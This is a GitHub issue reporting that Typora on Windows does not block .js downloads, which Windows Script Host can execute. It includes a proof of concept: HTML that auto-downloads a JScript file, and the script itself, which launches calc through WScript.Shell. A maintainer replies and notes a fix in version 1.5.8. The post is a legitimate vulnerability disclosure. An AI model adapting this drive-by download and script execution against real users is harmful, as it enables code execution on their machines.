Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Typora on Windows fails to properly filter WSH JScript, which may result in code execution #5623

Closed
liyansong2018 opened this issue Feb 9, 2023 · 2 comments

Comments

@liyansong2018
Copy link

liyansong2018 commented Feb 9, 2023

Description

Although typora filters most dangeruos suffix, it still retains the .js file which will be recognized as WSH(Windows Script Host) JScript on Windows operating system. Users click on evil markdown file may cause code execution.

Version: 0.9.78-1.5.5(latest)

demo

Attachment

poc.md

poc.html

<!-- auto download !-->
<html>
<script>
    var blob = new Blob(['var WshShell = new ActiveXObject("WScript.Shell");var ret = WshShell.run("calc");if (ret == 0)WScript.Echo("You were hacked.");WScript.Quit();'],{type:'application/js'});
    var a = document.createElement('a');
    a.href = window.URL.createObjectURL(blob);
    a.download =  'poc.js';
    a.click();
</script>
</html>

<!-- click to download !-->
<a href="http://127.0.0.1:8000/poc.js" download="poc.js">CLICK~~</a>

poc.js

var WshShell = new ActiveXObject("WScript.Shell");
var ret = WshShell.run("calc");
if (ret == 0)
    WScript.Echo("You were hacked.")
WScript.Quit();
@abnerlee
Copy link
Contributor

abnerlee commented Feb 14, 2023

If you set WSH as default application for .js files, then when you click poc.js in File Explorer, the script will also be executed. Actually user should not set WSH as default application for .js files.

@abnerlee
Copy link
Contributor

improved in 1.5.8

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants